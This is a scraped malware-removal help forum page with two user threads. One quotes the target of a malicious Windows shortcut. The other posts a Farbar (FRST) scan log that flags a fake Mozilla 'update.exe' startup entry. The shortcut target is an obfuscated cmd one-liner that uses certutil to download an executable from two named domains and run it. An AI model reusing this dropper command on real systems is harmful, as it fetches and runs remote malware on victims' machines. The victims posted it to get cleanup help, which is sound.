.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Posted: 06 Jul 2020 11:33 AM PDT

Hi all,

Looking for feedback on the likelihood my double clicking of a bad .lnk file caused damage. When I did double click it, I remember getting a standard Windows dialog box. I believe it said the path did not exist or shortcut unavailable. I'm not finding anything in my startup folder for C:\programdata or my username appdata startup folder. I ran scans with Malwarebytes, Hitman with no results.

The .lnk file target was:

%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1

The .lnk file 'start-in' was:

"%APPDATA%\Mic…

update.exe from mozilla probably fake - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

My PC froze while I was playing a game, so I did some googling.

I get this thing every time I boot up my PC:

https://ibb.co/740dDLn

https://ibb.co/37LmQ31

https://ibb.co/qdsRM2w

I used FRST; it said that I need fixlist.txt?

Thank you in advance for your kind support.

FRST LOG

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 11-04-2020
Ran by r_omi (administrator) on DESKTOP-D31LCR7 (Micro-Star International Co., Ltd MS-7C02) (12-04-2020 07:56:43)
Running from D:\Downloads
Loaded Profiles: r_omi (Available Profiles: r_omi)
Platform: Windows 10 Pro Version 1909 18363.752 (X64) Language: English (United States)
Default browser: Chrome
Boot Mode: Normal
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\79.0.3945.10\remoting_host.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\79.0.3945.10\remoting_host.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome.exe
(Logitech -> Logitech Inc.) C:\Program Files\Logitech\Gaming Software\LWEMon.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\LGHUB\lghub.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\LGHUB\lghub.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\LGHUB\lghub_agent.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\LGHUB\lghub_updater.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsStore_12004.1001.1.0_x64__8wekyb3d8bbwe\WinStore.App.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2003.8-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2003.8-0\NisSrv.exe
(MICRO-STAR INTERNATIONAL CO., LTD. -> ) C:\Program Files (x86)\MSI Afterburner\MSIAfterburner.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files (x86)\Common Files\LaunchpadWeb\update.exe
(NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_e0a5a1b06de180e3\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_e0a5a1b06de180e3\Display.NvContainer\NVDisplay.Container.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\RtkAudUService64.exe
(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\RtkAudUService64.exe
(Thesycon Software Solutions GmbH & Co. KG) [File not signed] C:\Program Files\FiiO\FiiO_Driver\W10_x64\FiiOCplApp.exe
(Valve -> Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(Valve -> Valve Corporation) D:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Valve -> Valve Corporation) D:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Valve -> Valve Corporation) D:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Valve -> Valve Corporation) D:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Valve -> Valve Corporation) D:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Valve -> Valve Corporation) D:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Valve -> Valve Corporation) D:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Valve -> Valve Corporation) D:\Program Files\Steam\steam.exe
==================== Registry (Whitelisted) ===================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [RtkAudUService] => C:\Windows\System32\RtkAudUService64.exe [956920 2019-12-12] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [Start WingMan Profiler] => C:\Program Files\Logitech\Gaming Software\LWEMon.exe [190536 2010-06-14] (Logitech -> Logitech Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [646160 2019-12-11] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-173970672-666801694-2624729176-1001\...\Run: [Google Update] => C:\Users\r_omi\AppData\Local\Google\Update\1.3.35.452\GoogleUpdateCore.exe [217544 2020-03-21] (Google LLC -> Google LLC)
HKU\S-1-5-21-173970672-666801694-2624729176-1001\...\Run: [LGHUB] => C:\Program Files\LGHUB\lghub.exe [71464072 2020-04-03] (Logitech Inc -> Logitech, Inc.)
HKU\S-1-5-21-173970672-666801694-2624729176-1001\...\Run: [firefox] => C:\Program Files (x86)\Common Files\LaunchpadWeb\update.exe [910296 2010-03-31] (Mozilla Corporation -> Mozilla Corporation) <==== ATTENTION
HKU\S-1-5-21-173970672-666801694-2624729176-1001\...\Run: [Steam] => D:\Program Files\Steam\steam.exe [3371296 2020-04-04] (Valve -> Valve Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\FiiO Control Panel Autostart.lnk [2019-12-03]
ShortcutTarget: FiiO Control Panel Autostart.lnk -> C:\Program Files\FiiO\FiiO_Driver\W10_x64\FiiOCplApp.exe (Thesycon Software Solutions GmbH & Co. KG) [File not signed]
GroupPolicy: Restriction ? <==== ATTENTION
==================== Scheduled Tasks (Whitelisted) ============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {069CF5C0-8104-4D3E-B4DA-2FD21E404F0F} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpCmdRun.exe [480272 2020-03-25] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {13373AB6-C29A-41C8-B3AA-6AB397953203} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpCmdRun.exe [480272 2020-03-25] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {135F4734-8A50-4809-B6CA-F5FC0F282B0B} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [653848 2019-12-08] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {3F6549D4-6E0F-4308-95E0-D26500CC4310} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpCmdRun.exe [480272 2020-03-25] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {626287BC-586E-41A4-8D45-7A328A8A0AD0} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [858480 2019-12-06] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {71773801-8623-4C23-A98E-BA0DB28E7FF2} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1134104 2019-12-08] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {80C6365E-DB46-4A1B-8EAA-7DEEE9641358} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpCmdRun.exe [480272 2020-03-25] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {97BEEF29-8E6A-4208-BC6E-DF2C9BCC03E8} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [914456 2019-12-08] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {9BCD5B38-49F7-49E8-8A77-8353E4F9C4A4} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1134104 2019-12-08] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {A26BC672-C1DE-422D-8D0E-2DA5C4FCF020} - System32\Tasks\AMDAutoUpdate => C:\Program Files\AMD\AutoUpdate\AMDAutoUpdate.exe [677624 2019-11-21] (Advanced Micro Devices INC. -> )
Task: {A6F70817-3FCB-46D5-8967-B2D524DD0C97} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [914456 2019-12-08] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {A7F07B37-516D-4567-99BE-AAAD715652EC} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-173970672-666801694-2624729176-1001UA => C:\Users\r_omi\AppData\Local\Google\Update\GoogleUpdate.exe [155432 2019-12-03] (Google Inc -> Google LLC)
Task: {B6E67F6F-DE8F-4740-964C-6EE6D86D8516} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1134104 2019-12-08] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {CA4EED07-06CF-4FD2-8965-A85890BAC4E0} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1134104 2019-12-08] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {D047C98A-2BA6-46FE-A551-E3E2105B49D9} - System32\Tasks\MSIAfterburner => C:\Program Files (x86)\MSI Afterburner\MSIAfterburner.exe [782320 2019-10-26] (MICRO-STAR INTERNATIONAL CO., LTD. -> )
Task: {E178A057-961C-4FB8-ACDE-93C0664C6D4F} - System32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [858480 2019-12-06] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {EA032502-26F4-4E5C-9FD7-0A701A4C2EB2} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-173970672-666801694-2624729176-1001Core => C:\Users\r_omi\AppData\Local\Google\Update\GoogleUpdate.exe [155432 2019-12-03] (Google Inc -> Google LLC)
Task: {EB4407DD-56D0-49D3-AAA6-DE6ED5D7DBC0} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3302880 2019-12-09] (NVIDIA Corporation -> NVIDIA Corporation)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 115.178.58.26 115.178.58.10 192.168.1.1
Tcpip\..\Interfaces\{c11f8f76-9e3d-4fd7-bda0-b861e748b28e}: [DhcpNameServer] 115.178.58.26 115.178.58.10 192.168.1.1
Internet Explorer:
==================
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> D:\Program Files\Internet Download Manager\IDMIECC64.dll [2019-10-19] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_241\bin\ssv.dll [2020-03-09] (Oracle America, Inc. -> Oracle Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_241\bin\jp2ssv.dll [2020-03-09] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> D:\Program Files\Internet Download Manager\IDMIECC.dll [2019-10-19] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
FF DefaultProfile: ru8jgfll.default
FF ProfilePath: C:\Users\r_omi\AppData\Roaming\Mozilla\Firefox\Profiles\ru8jgfll.default [2019-12-03]
FF ProfilePath: C:\Users\r_omi\AppData\Roaming\Mozilla\Firefox\Profiles\wtgd672l.default-release [2020-04-12]
FF Extension: (AdGuard AdBlocker) - C:\Users\r_omi\AppData\Roaming\Mozilla\Firefox\Profiles\wtgd672l.default-release\Extensions\adguardadblocker@adguard.com.xpi [2020-01-27]
FF ProfilePath: C:\Users\r_omi\AppData\Roaming\AMozilla\AFirefox\Profiles\d6zx2kke.default [2020-04-12] <==== ATTENTION
FF HKU\S-1-5-21-173970672-666801694-2624729176-1001\...\Firefox\Extensions: [mozilla_cc3@internetdownloadmanager.com] - D:\Program Files\Internet Download Manager\idmmzcc3.xpi
FF Extension: (IDM Integration Module) - D:\Program Files\Internet Download Manager\idmmzcc3.xpi [2019-09-20] [UpdateUrl:hxxps://data.internetdownloadmanager.com/idmmzcc3/update.json]
FF HKU\S-1-5-21-173970672-666801694-2624729176-1001\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\r_omi\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\r_omi\AppData\Roaming\IDM\idmmzcc5 [2019-12-04] [Legacy] [not signed]
FF HKU\S-1-5-21-173970672-666801694-2624729176-1001\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - D:\Program Files\Internet Download Manager\idmmzcc2.xpi
FF Extension: (IDM integration) - D:\Program Files\Internet Download Manager\idmmzcc2.xpi [2017-12-20] [Legacy]
FF Plugin: @java.com/DTPlugin,version=11.241.2 -> C:\Program Files\Java\jre1.8.0_241\bin\dtplugin\npDeployJava1.dll [2020-03-09] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.241.2 -> C:\Program Files\Java\jre1.8.0_241\bin\plugin2\npjp2.dll [2020-03-09] (Oracle America, Inc. -> Oracle Corporation)
CHR Profile: C:\Users\r_omi\AppData\Local\Google\Chrome\User Data\Default [2020-04-12]
CHR HomePage: Default -> hxxp://www.google.com/ncr
CHR DefaultSearchURL: Default -> hxxps://ssl.gstatic.com/chromoting/chromoting_logo_512.png
CHR Extension: (Slides) - C:\Users\r_omi\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-12-03]
CHR Extension: (Docs) - C:\Users\r_omi\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-12-03]
CHR Extension: (Google Drive) - C:\Users\r_omi\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2019-12-03]
CHR Extension: (AdGuard AdBlocker) - C:\Users\r_omi\AppData\Local\Google\Chrome\User Data\Default\Extensions\bgnkhhnnamicmpeenaelnjfhikgbkllg [2020-03-26]
CHR Extension: (YouTube) - C:\Users\r_omi\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-12-03]
CHR Extension: (uBlock Origin) - C:\Users\r_omi\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjpalhdlnbpafiamejdnhcphjbkeiagm [2020-02-06]
CHR Extension: (Chrome Remote Desktop) - C:\Users\r_omi\AppData\Local\Google\Chrome\User Data\Default\Extensions\efmjfjelnicpmdcmfikempdhlmainjcb [2020-02-19]
CHR Extension: (Sheets) - C:\Users\r_omi\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-12-03]
CHR Extension: (Chrome Remote Desktop) - C:\Users\r_omi\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbchcmhmhahfdphkhkmpfmihenigjmpp [2019-12-26]
CHR Extension: (Google Docs Offline) - C:\Users\r_omi\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-03-11]
CHR Extension: (Chrome Remote Desktop) - C:\Users\r_omi\AppData\Local\Google\Chrome\User Data\Default\Extensions\inomeogfingihgjfjlpeplalcfajhgai [2019-12-26]
CHR Extension: (UltraWide Video) - C:\Users\r_omi\AppData\Local\Google\Chrome\User Data\Default\Extensions\lngfncacljheahfpahadgipefkbagpdl [2020-04-11]
CHR Extension: (Chrome Web Store Payments) - C:\Users\r_omi\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-12-03]
CHR Extension: (Gmail) - C:\Users\r_omi\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-12-03]
CHR Extension: (Chrome Media Router) - C:\Users\r_omi\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-04-03]
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - D:\Program Files\Internet Download Manager\IDMGCExt.crx [2019-11-16]
CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - D:\Program Files\Internet Download Manager\IDMGCExt.crx [2019-11-16]
==================== Services (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [8567960 2020-04-04] (BattlEye Innovations e.K. -> )
R2 chromoting; C:\Program Files (x86)\Google\Chrome Remote Desktop\79.0.3945.10\remoting_host.exe [74392 2019-10-24] (Google LLC -> Google Inc.)
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [802432 2020-03-01] (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
R2 LGHUBUpdaterService; C:\Program Files\LGHUB/lghub_updater.exe [10131080 2020-04-03] (Logitech Inc -> Logitech, Inc.)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [858480 2019-12-06] (NVIDIA Corporation -> NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [858480 2019-12-06] (NVIDIA Corporation -> NVIDIA Corporation)
S3 Rockstar Service; C:\Program Files\Rockstar Games\Launcher\RockstarService.exe [1314448 2020-03-28] (Rockstar Games, Inc. -> Rockstar Games)
R2 RtkAudioUniversalService; C:\Windows\System32\RtkAudUService64.exe [956920 2019-12-12] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5930136 2020-04-12] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 uncheater_bgl; C:\Program Files\Common Files\Uncheater\uncheater_bgl.exe [2097008 2019-12-23] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2003.8-0\NisSrv.exe [3294680 2020-03-25] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2003.8-0\MsMpEng.exe [103168 2020-03-25] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_e0a5a1b06de180e3\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_e0a5a1b06de180e3\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem
===================== Drivers (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R3 amdgpio2; C:\Windows\System32\drivers\amdgpio2.sys [46040 2019-10-30] (Advanced Micro Devices INC. -> Advanced Micro Devices, Inc)
R3 amdgpio3; C:\Windows\System32\drivers\amdgpio3.sys [24528 2019-04-18] (AMD PMP-PE CB Code Signer v20160415 -> Advanced Micro Devices, Inc)
R3 AMDPCIDev; C:\Windows\System32\drivers\AMDPCIDev.sys [32520 2019-09-16] (Advanced Micro Devices INC. -> Advanced Micro Devices)
R0 amdpsp; C:\Windows\System32\drivers\amdpsp.sys [138064 2019-06-26] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc. )
R2 AMDRyzenMasterDriverV14; C:\Program Files\AMD\RyzenMaster\bin\AMDRyzenMasterDriver.sys [70432 2019-11-22] (Advanced Micro Devices INC. -> Advanced Micro Devices)
S3 BthA2dp; C:\Windows\System32\drivers\BthA2dp.sys [231936 2019-10-07] (Microsoft Corporation) [File not signed]
R3 fiio_usbaudio; C:\Windows\System32\drivers\fiio_usbaudio.sys [275104 2017-07-21] (Microsoft Windows Hardware Compatibility Publisher -> Thesycon Software Solutions GmbH & Co. KG)
R3 fiio_usbaudioks; C:\Windows\System32\drivers\fiio_usbaudioks.sys [52896 2017-07-21] (Microsoft Windows Hardware Compatibility Publisher -> Thesycon Software Solutions GmbH & Co. KG)
R2 LGHUBTemperatureService; C:\ProgramData\LGHUB\depots\47127\driver_cpu_temperature\logi_core_temp.sys [25448 2020-04-03] (Logitech Inc. -> Logitech)
R3 logi_joy_bus_enum; C:\Windows\system32\drivers\logi_joy_bus_enum.sys [38136 2019-12-03] (Logitech Inc -> Logitech)
R3 logi_joy_vir_hid; C:\Windows\system32\drivers\logi_joy_vir_hid.sys [20624 2019-12-03] (WDKTestCert sqa,131523902232810150 -> Logitech, Inc.)
R3 logi_joy_xlcore; C:\Windows\system32\drivers\logi_joy_xlcore.sys [66808 2019-12-03] (Logitech Inc -> Logitech)
R3 nvlddmkm; C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_e0a5a1b06de180e3\nvlddmkm.sys [23439288 2020-03-19] (NVIDIA Corporation -> NVIDIA Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30336 2019-12-07] (NVIDIA Corporation -> NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [69840 2019-11-21] (NVIDIA Corporation -> NVIDIA Corporation)
R3 nvvhci; C:\Windows\System32\drivers\nvvhci.sys [75600 2019-11-21] (NVIDIA Corporation -> NVIDIA Corporation)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [1154336 2019-06-19] (Realtek Semiconductor Corp. -> Realtek )
R3 RTCore64; C:\Program Files (x86)\MSI Afterburner\RTCore64.sys [24000 2019-09-26] (MICRO-STAR INTERNATIONAL CO., LTD. -> )
R2 SSGDIO; C:\Windows\SysWOW64\DRIVERS\ssgdio64.sys [14608 2019-12-04] (ATI Technologies, Inc -> ATI Technologies Inc.)
S0 WdBoot; C:\Windows\System32\drivers\wd\WdBoot.sys [45960 2020-03-25] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\wd\WdFilter.sys [391392 2020-03-25] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [59104 2020-03-25] (Microsoft Windows -> Microsoft Corporation)
S3 xhunter1; C:\Windows\xhunter1.sys [74552 2020-02-17] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.)
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One month (created) ===================
(If an entry is included in the fixlist, the file/folder will be moved.)
2020-04-12 07:55 - 2020-04-12 07:56 - 000000000 ____D C:\FRST
2020-04-12 07:45 - 2020-04-12 07:45 - 000000000 ____D C:\Users\r_omi\AppData\Roaming\Process Hacker 2
2020-04-12 07:40 - 2020-04-12 07:40 - 000036192 _____ (Sysinternals - www.sysinternals.com) C:\Windows\system32\Drivers\PROCEXP152.SYS
2020-04-12 07:29 - 2020-04-12 07:29 - 000007604 _____ C:\Users\r_omi\AppData\Local\Resmon.ResmonCfg
2020-04-12 07:22 - 2020-04-12 07:22 - 000001108 _____ C:\Users\r_omi\Desktop\Resource Monitor.lnk
2020-04-12 06:58 - 2020-04-12 06:58 - 000000080 ___SH C:\bootTel.dat
2020-04-12 05:49 - 2020-04-12 05:49 - 025444352 _____ (Microsoft Corporation) C:\Windows\system32\Hydrogen.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 022636544 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 019813376 _____ (Microsoft Corporation) C:\Windows\system32\HologramWorld.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 018027008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
